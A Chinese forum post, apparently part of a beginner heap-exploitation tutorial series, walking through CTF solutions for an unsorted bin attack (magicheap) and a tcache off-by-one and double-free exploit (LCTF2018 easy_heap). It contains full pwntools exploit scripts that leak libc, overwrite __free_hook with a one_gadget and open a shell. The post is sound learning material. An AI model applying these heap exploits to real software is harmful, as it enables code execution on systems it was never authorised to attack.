学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

2万

积分

41

好友

1171

主题
发表于 2020-5-27 14:33:20 | 查看: 5240| 回复: 0

相关题目:


pwn堆入门系列教程7
  先学习 Unsorted Bin Attack,这部分由于ctf-wiki题目较少,所以只练习了一道题
Large bin也没有题目,到时候遇到在进行学习
hitcontraining_lab14  这个题过程也比较简单,自己复现下就好
漏洞利用过程  因为现在都是tcache了,所以复现起来还是得拿老版本libc测试
  这里可以看出bk已经被修改
gdb-peda$ x/50gx 0x9ce0d0-0xd0
0x9ce000:   0x0000000000000000  0x0000000000000031
0x9ce010:   0x6161616161616161  0x6161616161616161
0x9ce020:   0x6161616161616161  0x6161616161616161
0x9ce030:   0x0000000000000000  0x0000000000000091
0x9ce040:   0x0000000a61646164  0x00000000006020b0
0x9ce050:   0x0000000000000000  0x0000000000000000
0x9ce060:   0x0000000000000000  0x0000000000000000
0x9ce070:   0x0000000000000000  0x0000000000000000
0x9ce080:   0x0000000000000000  0x0000000000000000
0x9ce090:   0x0000000000000000  0x0000000000000000
0x9ce0a0:   0x0000000000000000  0x0000000000000000
0x9ce0b0:   0x0000000000000000  0x0000000000000000
0x9ce0c0:   0x0000000000000090  0x0000000000000031
0x9ce0d0:   0x0000000a33333333  0x0000000000000000
0x9ce0e0:   0x0000000000000000  0x0000000000000000
0x9ce0f0:   0x0000000000000000  0x0000000000020f11
0x9ce100:   0x0000000000000000  0x0000000000000000
0x9ce110:   0x0000000000000000  0x0000000000000000
0x9ce120:   0x0000000000000000  0x0000000000000000
0x9ce130:   0x0000000000000000  0x0000000000000000
0x9ce140:   0x0000000000000000  0x0000000000000000
0x9ce150:   0x0000000000000000  0x0000000000000000
0x9ce160:   0x0000000000000000  0x0000000000000000
0x9ce170:   0x0000000000000000  0x0000000000000000
0x9ce180:   0x0000000000000000  0x0000000000000000

  这里可以看到magic被修改了
gdb-peda$ x/20gx 0x00000000006020b0+0x10
0x6020c0 <magic>:   0x00007ff41afe4b78  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0 <heaparray>:   0x00000000009ce010  0x00000000009ce040
0x6020f0 <heaparray+16>:    0x00000000009ce0d0  0x0000000000000000
0x602100 <heaparray+32>:    0x0000000000000000  0x0000000000000000
0x602110 <heaparray+48>:    0x0000000000000000  0x0000000000000000
0x602120 <heaparray+64>:    0x0000000000000000  0x0000000000000000
0x602130:   0x0000000000000000  0x0000000000000000
0x602140:   0x0000000000000000  0x0000000000000000
0x602150:   0x0000000000000000  0x0000000000000000

  拿到flag了
[DEBUG] Received 0x1a bytes:
'flag{unsorted_bin_attack}\n'
flag{unsorted_bin_attack}

exp
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from PwnContext.core import *
local = True

# Set up pwntools for the correct architecture
exe = './' + 'magicheap'
elf = context.binary = ELF(exe)

#don't forget to change it
host = '127.0.0.1'
port = 10000

#don't forget to change it
#ctx.binary = './' + 'magicheap'
ctx.binary = exe
libc = args.LIBC or 'libc.so.6'
ctx.debug_remote_libc = True
ctx.remote_libc = libc
if local:
context.log_level = 'debug'
io = ctx.start()
libc = ELF(libc)
else:
io = remote(host,port)
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      PIE enabled
def create_heap(size, content):
io.recvuntil(":")
io.sendline("1")
io.recvuntil(":")
io.sendline(str(size))
io.recvuntil(":")
io.sendline(content)


def edit_heap(idx, size, content):
io.recvuntil(":")
io.sendline("2")
io.recvuntil(":")
io.sendline(str(idx))
io.recvuntil(":")
io.sendline(str(size))
io.recvuntil(":")
io.sendline(content)


def del_heap(idx):
io.recvuntil(":")
io.sendline("3")
io.recvuntil(":")
io.sendline(str(idx))

def exp():
create_heap(0x20, "1111")  # 0
create_heap(0x80, "2222")  # 1
# in order not to merge into top chunk
create_heap(0x20, "3333")  # 2

del_heap(1)

magic = 0x00000000006020C0
fd = 0
bk = magic - 0x10

edit_heap(0, 0x20 + 0x20, "a" * 0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk))
create_heap(0x80, "dada")  #trigger unsorted bin attack
gdb.attach(io)
io.recvuntil(":")
io.sendline("4869")
io.interactive()
if __name__ == '__main__':
exp()
io.interactive()

  unsortbin attack通常用于修改循环次数以及global_max_fast从而任意大小chunk可以fastbin attack
  然后开始学习tcache
LCTF2018 PWN easy_heap  我感觉这道题质量挺高的,对于我这个新手来说,他用了挺多内存分配的知识,让我好好补了一波,这道题功能分析以及漏洞点分析请看ctf-wiki tcache篇
  我直接讲解漏洞利用过程
漏洞利用过程  这道题麻烦就麻烦在没法直接溢出覆盖pre_size,所以要巧妙的构造pre_size,最终在overlap,后面的就是常规操作了
  具体过程是跟ctf-wiki一样
具体过程:
  • 将 A -> B -> C 三块 unsorted bin chunk 依次进行释放
  • A 和 B 合并,此时 C 前的 prev_size 写入为 0x200
  • A 、 B 、 C 合并,步骤 2 中写入的 0x200 依然保持
  • 利用 unsorted bin 切分,分配出 A
  • 利用 unsorted bin 切分,分配出 B,注意此时不要覆盖到之前的 0x200
  • 将 A 再次释放为 unsorted bin 的堆块,使得 fd 和 bk 为有效链表指针
  • 此时 C 前的 prev_size 依然为 0x200(未使用到的值),A B C 的情况: A (free) -> B (allocated) -> C (free),如果使得 B 进行溢出,则可以将已分配的 B 块包含在合并后的释放状态 unsorted bin 块中。
  • tips: 但是在这个过程中需要注意 tcache 的影响。
堆初始化操作部分
#!/usr/bin/env python
# coding=utf-8
from pwn import *

io = process('./easy_heap')
libc = ELF('/home/NoOne/Documents/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
context.log_level = 'debug'

def choice(idx):
io.sendlineafter("> ", str(idx))

def malloc(size, content):
choice(1)
io.sendlineafter("> ", str(size))
io.sendlineafter("> ", content)

def free(idx):
choice(2)
io.sendlineafter("> ", str(idx))

def puts(idx):
choice(3)
io.sendlineafter("> ", str(idx))

def exit():
choice(4)

堆块重新排列
for i in range(7):
malloc(0x10, str(i)*0x7)
for i in range(3):
malloc(0x10, str(i+7)*0x7)
for i in range(6):
free(i)
free(9) #tcache for avoid top chunk consolidate
for i in range(6, 9):
free(i)
# now the heap 
# tcache-0
# tcache-1
# tcache-2
# tcache-3
# tcache-4
# tcache-5
# unsorted - 6
# unsorted - 7
# unsorted - 8
# tcache-9

for i in range(7):
malloc(0x10, str(i)*0x7)
for i in range(3):
malloc(0x10, str(i+7)*0x7)

# now the heap 
# chunk-6
# chunk-5
# chunk-4
# chunk-3
# chunk-2
# chunk-1
# chunk - 7
# chunk - 8
# chunk - 9
# chunk-0

off-by-one覆盖造成overlap
for i in range(6):
free(i)
free(8)
free(7)
# now chunk -9's pre_size is 0x200
malloc(0xf8, str(8)*0x7) #off-by-one change chunk9's insue
free(6) # free into tcache, so we can use unsortbin consolidate
free(9) # unsortbin consolidate

# now the heap 
# chunk-6   tcache
# chunk-5   tcache
# chunk-4   tcache
# chunk-3   tcache
# chunk-2   tcache
# chunk-1   tcache
# chunk - 7 unsorted     7-9 consolidate, and 8 in the big free_chunk
# chunk - 8 use          this is the overlap
# chunk - 9 unsorted
# chunk-0   tcache

  这里需要注意的是,off-by-one这里要覆盖到inuse的话,是得申请0xf8大小,malloc(0xf8)后,
  • 它会重用下个堆快的pre_size作为数据块
  • 所以我们off-by-one才能覆盖到insue位
    他会在ptr[0xf8]=0;这里就将size处的insue变成0
    然后此时tcache还没满,所以free(6)让tcache填满后,才能用触发unsortbin合并
申请0xf8,让剩余的unsortbin对齐到第0块chunk
# now the heap 
# chunk-6   tcache
# chunk-5   tcache
# chunk-4   tcache
# chunk-3   tcache
# chunk-2   tcache
# chunk-1   tcache
# chunk - 7 unsorted     7-9 consolidate, and 8 in the big free_chunk
# chunk - 8 use          this is the overlap
# chunk - 9 unsorted
# chunk-0   tcache
for i in range(7):
malloc(0x10, str(i+1)*0x7)
malloc(0x10, str(0x8))

# now the heap
# chunk-1 
# chunk-2
# chunk-3
# chunk-4
# chunk-5
# chunk-6
# chunk-8 
# chunk-0
#
# chunk-7

puts(0)

  这时候我们puts(0)就可以泄露了,
后面简单的double free
libc_leak = u64(io.recvline().strip().ljust(8, '\x00'))
io.success("libc_leak: 0x%x" % libc_leak)
libc_base = libc_leak - 0x3ebca0
malloc(0x10, str(0x9))

# now the heap
# chunk-1 
# chunk-2
# chunk-3
# chunk-4
# chunk-5
# chunk-6
# chunk-8 
# chunk-0 chunk-9
#
# chunk-7
free(1) #bypass the tcache count check
free(0) 
free(9) #double free

free_hook = libc_base + libc.symbols['__free_hook']
one_gadget = libc_base + 0x4f2c5 
one_gadget = libc_base + 0x4f322# 0x10a38c
malloc(0x10, p64(free_hook))
malloc(0x10, '/bin/sh;#')
malloc(0x10, p64(one_gadget))
io.success("free_hook: 0x%x" % free_hook)
#gdb.attach(io)
free(0)

  这里有个注意的地方,free(1)这里看好
4194    ------------------------------ free ------------------------------
4195  */
4196 
4197 static void
4198 _int_free (mstate av, mchunkptr p, int have_lock)
4199 {
4200   INTERNAL_SIZE_T size;        /* its size */
4201   mfastbinptr *fb;             /* associated fastbin */
4202   mchunkptr nextchunk;         /* next contiguous chunk */
4203   INTERNAL_SIZE_T nextsize;    /* its size */
4204   int nextinuse;               /* true if nextchunk is used */
4205   INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
4206   mchunkptr bck;               /* misc temp for linking */
4207   mchunkptr fwd;               /* misc temp for linking */
4208 
4209   size = chunksize (p);
4210 
4211   /* Little security check which won't hurt performance: the
4212      allocator never wrapps around at the end of the address space.
4213      Therefore we can exclude some size values which might appear
4214      here by accident or by "design" from some intruder.  */
4215   if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
4216       || __builtin_expect (misaligned_chunk (p), 0))
4217     malloc_printerr ("free(): invalid pointer");
4218   /* We know that each chunk is at least MINSIZE bytes in size or a
4219      multiple of MALLOC_ALIGNMENT.  */
4220   if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
4221     malloc_printerr ("free(): invalid size");
4222 
4223   check_inuse_chunk(av, p);
4224 
4225 #if USE_TCACHE
4226   {
4227     size_t tc_idx = csize2tidx (size);
4228 
4229     /* Check to see if it's already in the tcache.  */
4230     tcache_entry *e = (tcache_entry *) chunk2mem (p);
4231 
4232     /* This test succeeds on double free.  However, we don't 100%
4233        trust it (it also matches random payload data at a 1 in
4234        2^<size_t> chance), so verify it's not an unlikely coincidence
4235        before aborting.  */
4236     if (__glibc_unlikely (e->key == tcache && tcache))
4237       {
4238         tcache_entry *tmp;
4239         LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
4240         for (tmp = tcache->entries[tc_idx];
4241              tmp;
4242              tmp = tmp->next)
4243           if (tmp == e)
4244             malloc_printerr ("free(): double free detected in tcache 2");
4245         /* If we get here, it was a coincidence.  We've wasted a few
4246            cycles, but don't abort.  */
4247       }
4248 
4249     if (tcache
4250         && tc_idx < mp_.tcache_bins
4251         && tcache->counts[tc_idx] < mp_.tcache_count)
4252       {
4253         tcache_put (p, tc_idx);
4254         return;
4255       }
4256   }
4257 #endif

  源码在最后一部分检查了tcache的数量,所以free的时候得使tcache的数量对的上。
  说多了都是泪,简单题做着不简单,花了好长时间
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *

io = process('./easy_heap')
libc = ELF('/home/NoOne/Documents/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
context.log_level = 'debug'

def choice(idx):
io.sendlineafter("> ", str(idx))

def malloc(size, content):
choice(1)
io.sendlineafter("> ", str(size))
io.sendlineafter("> ", content)

def free(idx):
choice(2)
io.sendlineafter("> ", str(idx))

def puts(idx):
choice(3)
io.sendlineafter("> ", str(idx))

def exit():
choice(4)

#功能性测试
def test():
malloc(0x20, 'a'*0x20)
puts(0)
free(0)
exit()

def exp():
for i in range(7):
malloc(0x10, str(i)*0x7)
for i in range(3):
malloc(0x10, str(i+7)*0x7)
for i in range(6):
free(i)
free(9) #tcache for avoid top chunk consolidate
for i in range(6, 9):
free(i)
# now the heap 
# tcache-0
# tcache-1
# tcache-2
# tcache-3
# tcache-4
# tcache-5
# unsorted - 6
# unsorted - 7
# unsorted - 8
# tcache-9

for i in range(7):
malloc(0x10, str(i)*0x7)
for i in range(3):
malloc(0x10, str(i+7)*0x7)

# now the heap 
# chunk-6
# chunk-5
# chunk-4
# chunk-3
# chunk-2
# chunk-1
# chunk - 7
# chunk - 8
# chunk - 9
# chunk-0

for i in range(6):
free(i)
free(8)
free(7)
# now chunk -9's pre_size is 0x200
malloc(0xf8, str(8)*0x7) #off-by-one change chunk9's insue
free(6) # free into tcache, so we can use unsortbin consolidate
free(9) # unsortbin consolidate

# now the heap 
# chunk-6   tcache
# chunk-5   tcache
# chunk-4   tcache
# chunk-3   tcache
# chunk-2   tcache
# chunk-1   tcache
# chunk - 7 unsorted     7-9 consolidate, and 8 in the big free_chunk
# chunk - 8 use          this is the overlap
# chunk - 9 unsorted
# chunk-0   tcache
for i in range(7):
malloc(0x10, str(i+1)*0x7)
malloc(0x10, str(0x8))

# now the heap
# chunk-1 
# chunk-2
# chunk-3
# chunk-4
# chunk-5
# chunk-6
# chunk-8 
# chunk-0
#
# chunk-7

puts(0)
libc_leak = u64(io.recvline().strip().ljust(8, '\x00'))
io.success("libc_leak: 0x%x" % libc_leak)
libc_base = libc_leak - 0x3ebca0
malloc(0x10, str(0x9))

# now the heap
# chunk-1 
# chunk-2
# chunk-3
# chunk-4
# chunk-5
# chunk-6
# chunk-8 
# chunk-0 chunk-9
#
# chunk-7
free(1) #bypass the tcache count check
free(0) 
free(9) #double free

free_hook = libc_base + libc.symbols['__free_hook']
one_gadget = libc_base + 0x4f2c5 
one_gadget = libc_base + 0x4f322# 0x10a38c
malloc(0x10, p64(free_hook))
malloc(0x10, '/bin/sh;#')
malloc(0x10, p64(one_gadget))
io.success("free_hook: 0x%x" % free_hook)
#gdb.attach(io)
free(0)



if __name__ == '__main__':
exp()
io.interactive()

小知识点  vmmap 这个命令可以指定具体想要查看的内容,比如
  • vmmap libc
  • vmmap heap
  • vmmap stack
  • vmmap map
  tcache是FILO,跟栈是类似的
  patchelf 可以指定版本libc, 这样可以调试带符号的libc,加上glibc-all-in-one这个项目或者自己去下载glibc就可以用pwndbg的那些heap  bins等命令了
具体如下:
patchelf --set-interpreter libc目录/ld-2.27.so --set-rpath libc目录 文件名
总结
  • 加入tcache后攻击方法变得相对简单,堆块的申请却变得复杂了,因为在leak的时候要考虑tcache,以及构造的时候也要考虑tcache
  • 我觉得不需要跟我一样标注出每个堆块的位置,我只是学习tcache,所以标注出来方便自己看
  • 堆块重用这部分经常都是跟off-by-one结合起来
参考链接  ctf-wiki


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

GMT+8, 2024-12-23 05:22 , Processed in 0.262099 second(s), 39 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表